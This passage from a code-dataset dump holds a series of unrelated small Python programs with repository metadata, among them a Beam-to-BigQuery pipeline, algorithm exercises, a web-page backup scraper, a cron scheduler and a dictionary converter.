get_current_time_millis():\n return int(round(time.time() * 1000))\n\ndef run(attributes, options):\n\n runner = str(options['runner'])\n input_source = 
attributes['input_source']\n notification_time = attributes['notified_at']\n upload_time = attributes['uploaded_at']\n partition_time = attributes['partitioned_at']\n destination = '{}:{}.{}'.format(options['project_id'], options['destination_dataset'], attributes['destination_table'])\n pipeline_params = []\n invalid_data_gcs_dir = attributes['invalid_data_gcs_dir']\n\n if runner == 'DataFlowRunner':\n pipeline_params = [\n '--project', options['project_id'],\n '--temp_location', options['temp_location'],\n '--job_name', '{}-{}'.format(attributes['destination_table'].replace('_','-'), attributes['job_id']),\n '--setup_file', options['setup_file']\n ]\n \n p = beam.Pipeline(runner=runner, argv=pipeline_params)\n input_coll = p | 'read_file_{}'.format(input_source) >> ReadFromText(input_source) \n \n if '.ndjson' in input_source:\n parsed_coll = input_coll | 'parse_elements_(ndjson)' >> beam.ParDo(\n ParseRowNdjsonFn(), input_source, notification_time, upload_time, partition_time, \n to_validation_step=False if attributes['schema'] is None else True\n )\n \n # else\n # parse csv data \n\n if attributes['schema'] is None:\n parsed_coll | 'write_to_BQ_without_validation' >> beam.io.WriteToBigQuery(\n destination,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n else:\n valid_coll, invalid_coll = parsed_coll | 'validate_rows' >> beam.ParDo(\n ValidateRowFn(attributes['schema'])).with_outputs('invalid_coll', main='valid_coll'\n )\n \n valid_coll | 'write_valid_coll_to_BQ' >> beam.io.WriteToBigQuery(\n destination,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n\n invalid_coll | 'write_invalid_coll_to_GCS' >> beam.io.WriteToText(invalid_data_gcs_dir, file_name_suffix='.ndjson')\n\n p.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--params',\n dest='params',\n required=True,\n help='Parameters for pipelines')\n args = parser.parse_args()\n params = json.loads(args.params)\n run(attributes=params, options=params['options'])\n ","repo_name":"aliarham11/pipeline-api","sub_path":"pipeline_api/pipelines/data_lake_sink/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39865943547","text":"#Karla Ivonne Serrano Arevalo\n#Ejerercicio 1\n#25 noviembre 2016\n\nfrom PIL import Image, ImageDraw\nimport random\nimport math\n \ndef distance(p1, p2):\n return ((p2[0] - p1[0])**2 + (p2[1] - p1[1])**2)**0.5\n \ndef midPointAdjust(p1, p2, r, size):\n return ( int((p1[0] + p2[0])/r) + size[0]//6 , int((p1[1] + p2[1])/r) + size[1]//6 )\n \ndef midPoint(p1, p2, r, size):\n return ( int((p1[0] + p2[0])/r), int((p1[1] + p2[1])/r))\n \n\nn = 9\nr = 3\nbase = 800\npoints = 1000000\n \n\nwhite = (255, 255, 255)\ncolor = (255, 0, 0)\n \n\nif n == 3:\n size = base, int(3**.5 / 2 * base)\n redCorner = (size[0]//2, 5)\n blueCorner = (5, size[1]-5)\n greenCorner = (size[0]-5, size[1]-5)\n corners = (redCorner, blueCorner, greenCorner)\n \nelif n >= 4:\n \n size = base, base\n radious = base\n angle = 2 * math.pi / n\n corners = [ ( int(size[0]//2 + radious * math.sin(i * angle)), int(size[1]//2 + radious * math.cos(i * angle)) ) for i in range(n) ]\n \n\npolygonImg = Image.new('RGB', size, (0,0,0))\ndraw = ImageDraw.Draw(polygonImg)\n \n\ncurrent = corners[ random.randint(0,len(corners)-1) ]\nfor i in range(points):\n randCorner = corners[ random.randint(0,len(corners)-1) ]\n if n == 3:\n current = 
midPoint(current, randCorner, r, size)\n else:\n current = midPointAdjust(current, randCorner, r, size)\n draw.point(current, color)\n \npolygonImg.show()\n#polygonImg.save(\"fractal.png\")\n","repo_name":"KarlaISA/Programacion","sub_path":"Laboratorio2/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318190430","text":"from collections import deque\n\n\ndef dfs(x, y, cnt):\n global step\n if cnt > step:\n return\n if x == n - 1 and y == m - 1:\n step = min(step, cnt)\n else:\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if not visited[nx][ny] and d[nx][ny] == 1:\n visited[nx][ny] = True\n dfs(nx, ny, cnt + 1)\n visited[nx][ny] = False\n\n'''\ndef bfs(cnt):\n global step\n visited[0][0] = True\n queue = deque([(0, 0)])\n check = -1\n while queue:\n if check > 0:\n cnt -= check\n check = -1\n x, y = queue.popleft()\n if x == n - 1 and y == m - 1:\n step = cnt\n break\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if not visited[nx][ny] and d[nx][ny] == 1:\n visited[nx][ny] = True\n cnt += 1\n check += 1\n queue.append((nx, ny))\n'''\n\n\nn, m = map(int, input().split())\nd = []\nfor _ in range(n):\n d.append(list(map(int, input())))\n\nstep = 1e9\nvisited = [[False] * m for _ in range(n)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n#'''\nvisited[0][0] = True\ndfs(0, 0, 1)\n#'''\n'''\nbfs(1)\n'''\nprint(step)\n","repo_name":"castle-joooun/algorithm_python","sub_path":"Backjoon/dfs, bfs/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36465089525","text":"#\n# * Core 87, Alphanumerica Less\n# * Medium\n\n# * An alphanumeric ordering of strings is defined as follows: each string is \n# * considered as a sequence of tokens, where each token is a letter or a number \n# * (as opposed to an isolated digit, as is the case in lexicographic ordering). \n# * For example, the tokens of the string \"ab01c004\" are [a, b, 01, c, 004]. In \n# * order to compare two strings, we'll first break them down into tokens and \n# * then compare the corresponding pairs of tokens with each other (i.e. compare \n# * the first token of the first string with the first token of the second string, \n# * etc).\n\n# Here is how tokens are compared:\n\n# If a letter is compared with another letter, the usual alphabetical order \n# applies.\n# A number is always considered less than a letter.\n# When two numbers are compared, their values are compared. Leading zeros, if \n# any, are ignored.\n\n# If at some point one string has no more tokens left while the other one still \n# does, the one with fewer tokens is considered smaller.\n\n# If the two strings s1 and s2 appear to be equal, consider the smallest index i \n# such that tokens(s1)[i] and tokens(s2)[i] (where tokens(s)[i] is the ith token \n# of string s) differ only by the number of leading zeros. If no such i exists, \n# the strings are indeed equal. 
Otherwise, the string whose ith token has more \n# leading zeros is considered smaller.\n\n# Here are some examples of comparing strings using alphanumeric ordering.\n\n# \"a\" < \"a1\" < \"ab\"\n# \"ab42\" < \"ab000144\" < \"ab00144\" < \"ab144\" < \"ab000144x\"\n# \"x11y012\" < \"x011y13\"\n\n# Your task is to return true if s1 is strictly less than s2, and false otherwise.\n\n# Example\n\n# For s1 = \"a\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = true;\n\n# These strings have equal first tokens, but since s1 has fewer tokens than \n# s2, it's considered smaller.\n\n# For s1 = \"ab\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = false;\n\n# These strings also have equal first tokens, but since numbers are considered \n# less than letters, s1 is larger.\n\n# For s1 = \"b\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = false.\n\n# Since b is greater than a, s1 is larger.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s1\n\n# A string consisting of English letters and digits.\n\n# Guaranteed constraints:\n# 1 ≤ s1.length ≤ 20.\n\n# [input] string s2\n\n# A string consisting of English letters and digits.\n\n# Guaranteed constraints:\n# 1 ≤ s2.length ≤ 20.\n\n# [output] boolean\n\n# true if s1 is alphanumerically strictly less than s2, false otherwise.\n\n#%%\n\n# * Solution 1\n# ! Bad idea\ndef alphanumericLess1(s1: str, s2: str) -> bool:\n n1 = len(s1)\n n2 = len(s2)\n i1 = 0\n i2 = 0\n while i1 < n1 and i2 < n2:\n # * both are digit\n if s1[i1].isdigit() and s2[i2].isdigit():\n j1 = i1\n j2 = i2\n n1str = ''\n n2str = ''\n while i1 < n1 and s1[i1].isdigit():\n n1str += s1[i1]\n i1 += 1\n while i2 < n2 and s2[i2].isdigit():\n n2str += s2[i2]\n i2 += 1\n if int(n1str) > int(n2str):\n return False\n elif int(n1str) == int(n2str):\n if (i1 - j1) <= (i2 - j2):\n return False\n \n else:\n if s1[i1] > s2[i2]:\n return False\n else:\n i1 += 1\n i2 += 1\n\n return n1 <= n2\n\n\n# * Solution 2\ndef alphanumericLess(s1: str, s2: str) -> bool:\n token1 = []\n token2 = []\n n1 = len(s1)\n n2 = len(s2)\n\n # * get token 1\n i = 0\n while i < n1:\n c = s1[i]\n if c.isdigit():\n numStr = ''\n while i < n1 and s1[i].isdigit():\n numStr += s1[i]\n i += 1\n token1.append(numStr)\n else:\n token1.append(c)\n i += 1\n \n # print(token1)\n\n # * get token 2\n i = 0\n while i < n2:\n c = s2[i]\n if c.isdigit():\n numStr = ''\n while i < n2 and s2[i].isdigit():\n numStr += s2[i]\n i += 1\n token2.append(numStr)\n else:\n token2.append(c)\n i += 1\n \n # print(token2)\n\n tn1 = len(token1)\n tn2 = len(token2)\n tn = min(tn1, tn2)\n\n # * compare token1 and token 2, one by one;\n # ! The cases of > or < make decison, only cases of == pass\n for i in range(tn):\n if token1[i].isdigit() and token2[i].isdigit():\n if int(token1[i]) > int(token2[i]):\n return False\n elif int(token1[i]) < int(token2[i]):\n return True\n elif token1[i] > token2[i]:\n return False\n elif token1[i] < token2[i]:\n return True\n\n # * if all tokens are same, compare number of tokens\n # ! The cases of > or < make decison, only cases of == pass\n if tn1 > tn2:\n return False\n elif tn1 < tn2:\n return True\n\n # * if all tokens are same, number of tokens are same\n # * check leading zero number for digital tokens\n # ! 
The cases of > or < make decison, only cases of == pass\n for j in range(tn):\n if ( token1[j].isdigit() and token2[j].isdigit() ) and ( int(token1[j]) == int(token2[j]) ):\n if len(token1[j]) < len(token2[j]):\n return False\n elif len(token1[j]) > len(token2[j]):\n return True\n\n # * all tokens are same, number of tokens are same, MUST False\n return False\n\n\n\n\na1 = 'a'\na2 = 'a1'\na3 = 'ab'\na4 = 'ab42'\na5 = 'ab000144'\na6 = 'ab00144'\n\nr1 = alphanumericLess(a1, a2)\nprint('ex: {}, ar: {}'.format(True, r1))\n\nr2 = alphanumericLess(a2, a3)\nprint('ex: {}, ar: {}'.format(True, r2))\n\nr3 = alphanumericLess(a3, a4)\nprint('ex: {}, ar: {}'.format(True, r3))\n\nr4 = alphanumericLess(a4, a5)\nprint('ex: {}, ar: {}'.format(True, r4))\n\nr5 = alphanumericLess(a5, a6)\nprint('ex: {}, ar: {}'.format(True, r5))\n\na7 = 'x11y012'\na8 = 'x011y13'\n\nr6 = alphanumericLess(a7, a8)\nprint('ex: {}, ar: {}'.format(True, r6))\n\na9 = '0000'\na10 = '000'\nr7 = alphanumericLess(a9, a10)\nprint('ex: {}, ar: {}'.format(True, r7))\n\na11 = 'x817skjd8309218xn'\na12 = 'x817sljd8309217xn'\nr8 = alphanumericLess(a11, a12)\nprint('ex: {}, ar: {}'.format(True, r8))\n\na13 = 'a'\nr9 = alphanumericLess(a1, a13)\nprint('ex: {}, ar: {}'.format(False, r9))\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C87AlphanumericaLess.py","file_name":"C87AlphanumericaLess.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38817123210","text":"def batas():\r\n print(\"======================================================================================\")\r\n\r\nx=[1,2,3]\r\nfor i in x:\r\n print(f\"untuk langkah pertama -> {i}\")\r\ny=(1,2,3)\r\n\r\nx=[\r\n (1,['a','b','c'],3),\r\n (4,5,6)\r\n]\r\n\r\nprint(x[1][1])\r\n\r\nx[0][1][2]=\"Andi\"\r\nx[0][1].append('d')\r\nprint(x)\r\nx=tuple(x)\r\nprint(x)\r\n\r\nbatas()\r\nx=[1,2,3]\r\ny=(1,2,3)\r\n#set/himpunan, no indexing\r\n#1. no indexing\r\n#2. unique element\r\n#3. 
set itu mutable, eleme2nya immutable (set itu bisa masukin tuple (karena immutable), tapi ga bisa masukkin array (karena mutable))\r\n\r\nz = {1,2,3,4}\r\nprint(z)\r\nprint(list(z))\r\ntest=[\r\n {\r\n \"nama\": \"farid\",\r\n \"kelas\": [\r\n \"satu\", \"dua\"\r\n ]\r\n }\r\n]\r\nprint(test)\r\nz.add('a')\r\nprint(z)\r\n# for i, j in enumerate(z):\r\n# print(f\"index {i} -> value {j}\")\r\n# #print(j)\r\n\r\n#cara akses elemen dari set\r\n# -> ubah jadi list\r\n# z=list(z); print(z[0])\r\n# -> pake looping\r\n# for i in z: print(i)\r\nbatas()\r\n# z.add(8)\r\n# print(z)\r\n# z.update([10])\r\n# print(z)\r\n# z.discard('a')\r\n# print(z)\r\nz={1,2,3,4,5,6,7,8,9}\r\nz.pop()\r\nz.pop()\r\n\r\n#to delete the set -> del z \r\nprint(z)","repo_name":"faridrah0514/JC-Data-Science","sub_path":"Module 01/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18957679047","text":"from celery_study.celery_task.celery_app import cel_app\n\n\ndef worker_start():\n from celery.bin import worker as celery_worker\n worker = celery_worker.worker(app=cel_app)\n worker.run(concurrency=4, traceback=False, loglevel='INFO', P=\"eventlet\")\n\n\nif __name__ == \"__main__\":\n worker_start()","repo_name":"bobowang2017/python_study","sub_path":"celery_study/celery_task/start_worker.py","file_name":"start_worker.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8959290607","text":"#!/usr/bin/python3\n'''\nModule containing a function that queries the Reddit API and returns the\nnumber of subscribers for a given subreddit.\nIf subreddit is given, the function returns 0\n'''\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n '''\n function that queries reddit API and returns number of subscribers\n '''\n URL = 'https://api.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {'user-agent': 'test_app'}\n\n response = requests.get(URL, headers=headers, allow_redirects=False)\n\n if response.status_code == 200:\n data = response.json()\n data = data.get('data')\n return data.get('subscribers', 0)\n else:\n return 0\n","repo_name":"reckafella/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35154080370","text":"# -*- coding: cp936 -*-\nimport urllib2,time,os,re,sys,getopt,string\ndef filepath(): #得到所需要的与系统时间相关的文件夹名,返回值类型为str\n now = time.localtime()\n year=str(now.tm_year)\n mon=now.tm_mon\n if mon<10:\n mon=''.join(['0',str(mon)])\n else:\n mon=str(mon)\n day=now.tm_mday\n if day<10:\n day=''.join(['0',str(day)])\n else:\n day=str(day)\n hour=now.tm_hour\n if hour<10:\n hour=''.join(['0',str(hour)])\n else:\n hour=str(hour)\n mmin=now.tm_min\n if mmin<10:\n mmin=''.join(['0',str(mmin)])\n else:\n mmin=str(mmin)\n dirname=''.join([year,mon,day,hour,mmin])\n return dirname\n\ndef webGrab(buf,path,mode):#将buf以mode的存储模式存储在本地path下\n out = open(path,mode)\n out.write(buf)\n out.close()\n \ndef makedr(title,path): #在path路径下创建名为title的文件夹,并且返回该文件夹的路径,返回值类型str\n new_path = os.path.join(path, title)\n if not os.path.isdir(new_path):\n os.makedirs(new_path)\n return new_path\n\ndef makeFolder(htmlPath): #新建与时间相关的文件夹\n title = filepath()\n 
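# filepath() above builds a YYYYMMDDHHMM timestamp string; it becomes the name of the backup folder\n    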
new_htmlPath=makedr(title,htmlPath)#在\\tmp\\backup\\新建与系统时间相关的文件夹\n return new_htmlPath\ndef getFile(addr,path): #存储已知网页路径的文件,存储到本地path的位置,文件名为本来的名字不变\n splitPath = addr.split('/')\n fName = splitPath.pop()\n f=urllib2.urlopen(addr)\n buf=f.read()\n webGrab(buf,'%s\\\\%s'%(path,fName),'wb')\n \ndef CodeOut(startLabel,endLabel,fileNum,fileContent,fileSuffix,path):#取出相应标签内的代码\n fileContent=fileContent.split(startLabel)\n fileContent.pop(0)\n fileContent=''.join(fileContent)\n fileContent=fileContent.split(endLabel)\n fileContent.pop()\n fileContent=''.join(fileContent)\n fileName=str(fileNum)+fileSuffix\n webGrab(fileContent,'%s\\\\%s'%(path,fileName),'wb')#保存代码\n \ndef jsCode(new_htmlPath,buf):#抓取js的函数\n addrjs=re.findall('',buf,re.S)\n while addrjs!=[]:\n jsPath=makedr('js',new_htmlPath)#新建js文件夹\n singleJs=addrjs.pop()#弹出list的最后一个\n singleJs1=re.findall('http.*?\\.js',singleJs)#验证是否是.js结尾的js\n if singleJs1!=[]: #判断条件 js文件的网页路径已知\n singleJs1=''.join(singleJs1)\n getFile(singleJs1,jsPath)\n else: #是内部的js\n global jsNameNum\n jsNameNum+=1\n CodeOut('',jsNameNum,singleJs,'.js',jsPath)\n\ndef cssCode(new_htmlPath,buf):#抓取css的函数\n addrcss=re.findall('',buf,re.S)# 外部样式表\n global cssNameNum\n while addrcss!=[]:\n cssPath=makedr('css',new_htmlPath)\n singleCss=addrcss.pop()\n cssNameNum+=1\n CodeOut('',cssNameNum,singleCss,'.css',cssPath)\n addrcss2=re.findall('http.*?\\.css',buf)#为了匹配内部样式表\n if addrcss2!=[]:\n cssPath=makedr('css',new_htmlPath)\n for n in addrcss2:\n getFile(n,cssPath)\n addrcss3=re.findall(r'style=\".*?\"',buf,re.S)#为了匹配内联样式\n addrcss3=list(set(addrcss3))#删除重复的样式\n while addrcss3!=[]:\n cssPath=makedr('css',new_htmlPath)\n singleCss3=addrcss3.pop()\n cssNameNum+=1\n CodeOut('style=\\\"','\\\"',cssNameNum,singleCss3,'.css',cssPath)\n\ndef imagefile(new_htmlPath,buf):#抓取图片的函数\n addrImg=re.findall('http://.*?\\.jpe?g|http://.*?\\.png',buf)#匹配图片\n addrImg=list(set(addrImg))\n imagePath=makedr('images',new_htmlPath)\n for i in addrImg:\n getFile(i,imagePath)\n\n\nopts,args=getopt.getopt(sys.argv[1:],'hd:u:o:')#处理命令行参数\nfor op,value in opts:\n if op=='-d':\n period=string.atoi(value)\n elif op=='-u':\n htmlUrl=value\n elif op=='-o':\n htmlPath=value\nstartTime=time.time()\nstopTime=time.time()+period\nwhile True:\n while stopTime-startTime>=period:#设置循环条件\n startTime=time.time()\n jsNameNum=0 #后面用来保存内部js的文件名,为了方便,内部的js存储名为整数0-n\n cssNameNum=0\n f=urllib2.urlopen(htmlUrl)\n buf=f.read()#抓取手机搜狐的网页\n new_htmlPath=makeFolder(htmlPath)#新建与时间相关的文件夹,返回路径\n webGrab(buf,'%s\\\\souhu.html'%new_htmlPath,'w')#存储html\n jsCode(new_htmlPath,buf)#存储js\n cssCode(new_htmlPath,buf)#存储css\n imagefile(new_htmlPath,buf)#存储图片\n stopTime=time.time()\n\n\n \n \n","repo_name":"huangyi1112/sohu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"195273302","text":"import turtle\nt = turtle.Turtle()\ncount = 0\nd = 1\ndistance = int(input(\"Nhập khoảng cách\"))\nwhile count <1000:\n t.forward(d)\n t.left(10)\n count +=1\n if(count %5 ==0) :\n d+=1\n if ( t.xcor() > distance):\n break\n \nturtle.done()","repo_name":"Thaitran99/BaitapCodeGym","sub_path":"Veduongxoanoc.py","file_name":"Veduongxoanoc.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38094559628","text":"from crontab import CronTab\nimport os\nfrom barefoot_winnie.d00_utils.get_project_directory import 
get_project_directory\nfrom pathlib import Path\n\nhome = Path.home()\npaths = get_project_directory()\nbash_path = \"/bin/bash\"\n\n\nclass CronJobs:\n def __init__(self, username):\n sys_path = os.environ.get(\"PATH\")\n self.cron = CronTab(user=username,\n log=os.path.join(\"tmp\", \"cron.log\"))\n self.cron.env['PATH'] = sys_path\n\n def training_pipeline_job(self):\n filename = home.joinpath(\n \"barefoot_winnie\", \"src\", \"pipeline_trigger.sh\")\n print(filename)\n job = self.cron.new(\n command=f\"{bash_path} {filename} >> /tmp/pipeline.log 2>&1\", comment=\"training_pipeline\")\n job.hour.on(2)\n self.cron.write_to_user()\n\n def view_jobs(self):\n for job in self.cron:\n print(job)\n\n def view_log(self):\n for d in self.cron.log:\n print(d['pid'] + \" - \" + d['date'])\n\n def remove_all_jobs(self):\n self.cron.remove_all()\n self.cron.write()\n\n def remove_jobs_by_comment(self, job_comment):\n self.cron.remove_all(comment=job_comment)\n\n\nif __name__ == \"__main__\":\n import getpass\n username = getpass.getuser()\n cron_jobs = CronJobs(username)\n cron_jobs.remove_all_jobs()\n cron_jobs.remove_jobs_by_comment('pipeline')\n cron_jobs.training_pipeline_job()\n cron_jobs.view_jobs()\n","repo_name":"dssg/barefoot-winnie-public","sub_path":"src/cron_job.py","file_name":"cron_job.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73951027947","text":"from torch import Tensor as T\nfrom abc import ABCMeta, abstractmethod\n\nfrom ._level import _Level\nfrom .view import View\nfrom kerch import utils\n\n\nclass Level(_Level, View, metaclass=ABCMeta):\n\n @utils.extend_docstring(_Level)\n @utils.extend_docstring(View)\n def __init__(self, *args, **kwargs):\n super(Level, self).__init__(*args, **kwargs)\n\n ####################################################################################################################\n\n def solve(self, sample=None, target=None, representation=None, **kwargs) -> None:\n r\"\"\"\n Fits the model according to the input ``sample`` and output ``target``. Many models have both a primal and\n a dual formulation to be fitted.\n\n :param sample: Input sample of the model., defaults to the sample provided by the model.\n :param target: Target sample of the model, defaults to ```None``\n :param representation: Representation of the model (``\"primal\"`` or ``\"dual\"``)., defaults to ``\"dual\"``.\n\n :type sample: Matrix, optional\n :type target: Matrix or vector, optional\n :type representation: str, optional\n \"\"\"\n\n # set the sample to input (always works for the underlying kernel)\n if sample is not None:\n self._log.info(\"Setting the sample to the provided input. 
Possibly overwriting a previous one.\")\n self.init_sample(sample) # keeping the stochastic state if set.\n\n # verify that the output has the same dimensions\n if target is not None:\n target = utils.castf(target, tensor=True)\n same_dim = sample.shape[0] == target.shape[0]\n if not same_dim:\n self._log.error(\"The number of sample points is not consistent with the output dimensions\")\n return\n\n # solve model\n return super(Level, self).solve(sample=sample,\n target=target,\n representation=representation,\n **kwargs)\n\n ####################################################################################################################\n\n @abstractmethod\n def loss(self, representation=None) -> T:\n pass\n","repo_name":"hdeplaen/kerch","sub_path":"kerch/rkm/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74798462188","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\ndef scrape_class_names(url):\n html = urlopen(url)\n bs = BeautifulSoup(html, 'html.parser')\n class_names = []\n if 'java/lang' in url:\n for i in bs.find_all('a', {'title': 'class in java.lang'}):\n class_names.append(i.get_text())\n elif 'java/util' in url:\n for i in bs.find_all('a', {'title': 'class in java.util'}):\n class_names.append(i.get_text())\n return class_names\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/scrape_oracle_docs.py","file_name":"scrape_oracle_docs.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41115760426","text":"import json\n\nclass KeyStore:\n\n def __init__(self):\n self.data = {}\n self.db_path = './data/store.json'\n try:\n with open(self.db_path) as db_file:\n stored = json.load(db_file)\n for key, val in stored.items():\n self.data[key] = bytes.fromhex(val)\n except Exception as e:\n self.save()\n\n def save(self):\n with open(self.db_path, 'w') as db_file:\n data = { key: val.hex() for (key,val) in self.data.items() }\n json.dump(data, db_file)\n\n def get(self, key):\n if key in self.data:\n return self.data[key]\n return None\n\n def set(self, key, val):\n if type(val) == bytes:\n self.data[key] = val\n self.save()","repo_name":"shouko/abmlicense-proxy","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11227711276","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re, xml.sax.saxutils\nimport mdparser\n\ndef decode_from_koi(str):\n return str.decode(\"koi8-r\").encode('utf-8')\n\nparser = mdparser.MakeDictParser()\n\nparser.parser_info['version']='0.1'\nparser.parser_info['dict_name']='Apresyan.koi'\nparser.parser_info['format']='apresyan'\nparser.start()\n\ndescription=decode_from_koi(parser.f.readline())+decode_from_koi(parser.f.readline()).rstrip()\n\nparser.set_dict_info(\"basename\", \"Apresyan\")\nparser.begin()\nparser.set_dict_info('full_name', 'Новый Большой Англо-Русский Словарь под редакцией Ю.Д. 
Апресяна')\nparser.set_dict_info('lang_from', 'ENG')\nparser.set_dict_info('lang_to', 'RUS')\nparser.set_dict_info('description', xml.sax.saxutils.escape(description))\nparser.info()\nparser.abbrs_begin()\nabbr_mode = 1\nabbr_list = {}\nart_beg=''\nart_end=''\ndata_beg=''\ndata_end=''\n\nind_pat = re.compile(\"(?P\\w+)>\", re.UNICODE)\nex_pat = re.compile(\"_Ex:\\s+(?P[a-zA-Z0-9!\\?\\.']+[a-zA-Z0-9!\\?\\.'\\s]+)(?P\\s+)\", re.UNICODE)\nword_pat = re.compile(\"([\\w\\.-]+)\", re.UNICODE)\n\nfor line in parser.f.readlines():\n res = decode_from_koi(line)\n key, data = res.split(\" \")\n\n data = xml.sax.saxutils.escape(data)\n data = ex_pat.sub(\"\\n\\g\\g\", data)\n data = ind_pat.sub(\"\\n\\g)\", data)\n\n if abbr_mode == 1:\n abbr_list[key] = '' + key + ''\n else:\n new_data = ''\n word_list = word_pat.split(data)\n for w in word_list:\n if w in abbr_list:\n new_data = new_data + abbr_list[w]\n else:\n new_data = new_data + w\n data = new_data\n print(art_beg + '' + xml.sax.saxutils.escape(key) + '\\n' + data_beg + data.rstrip() + data_end + art_end)\n\n if key == '_яп.':\n parser.abbrs_end()\n abbr_mode = 0\n art_beg = \"\"\n art_end = \"\"\n data_beg = \"\"\n data_end = \"\"\n\nparser.end()\n","repo_name":"jdehotin/dictionary_xdxf","sub_path":"src/apresyan.py","file_name":"apresyan.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36805987759","text":"import sys\nfrom vcf_ctan import vcf_record\n\nifile = open(sys.argv[1]).readlines()\nofile = open(sys.argv[2],\"w\")\n\nsamples= [\"AC\",\"BD\",\"Commander\",\"EC2.1\",\"EC2.2\",\"EC7.1\",\"EC7.2\",\"Fleet\",\"Hindmarsh\",\"La_Trobe\",\"Scope\",\"Vlamingh\",\"W1\",\"WI4304\",\"X1\",\"barke\",\"bowman\",\"haruna_Nijo\",\"igri\",\"spontaneum_B1k-04-12\"]\n\nfor one in ifile:\n if not one.startswith(\"#\"):\n record = vcf_record(one)\n if record.filter == 1:\n if abs(record.INDEL) >= 10:\n opt = \"\\t\".join(record.OPT) + \"\\n\"\n opt = opt.replace(\"/\",\"|\")\n ofile.write(opt)\n","repo_name":"ctan2020/test","sub_path":"vcf-filter-170619.py","file_name":"vcf-filter-170619.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41232988100","text":"import sys\n\ninput = sys.stdin.readline\nn = int(input())\ninfo = [list(map(int, input().split())) for _ in range(n)]\nmax_val = 0\n\ndp = [0] * (n+1)\nfor i in range(n-1, -1, -1):\n if n < i + info[i][0]:\n dp[i] = max_val\n continue\n dp[i] = max(info[i][1] + dp[i + info[i][0]], max_val)\n max_val = dp[i]\n \nprint(dp[0])\n","repo_name":"suzyrhkr/Algorithm-PS","sub_path":"samsung-sw/퇴사.py","file_name":"퇴사.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36016523794","text":"#!/usr/bin/env python3\n\nimport os\nimport pandas as pd\nimport convbase as cb\nimport matplotlib.pyplot as plt\n\ncolumns_list =['Wavelenght', 'Absorbance', 'Normalized', 'Max wavelenght']\n\nplot_props = {\n 'title' : 'Absorption',\n 'xlabel' : 'Wavelenght [nm]',\n 'ylabel' : 'Intensity [AU]',\n}\n\ndef create_plot(x_val, y_val, file_name):\n fig = plt.figure()\n splot = fig.add_subplot(1, 1, 1)\n splot.plot(x_val, y_val, '-', label=cb.get_file_name(file_name))\n splot.set(**plot_props)\n splot.margins(x=0)\n splot.legend(loc='best', frameon=False)\n plot_file = cb.get_new_extension(file_name, 'png')\n 
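# write the single-spectrum figure to the .png path derived above from the data file name\n    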
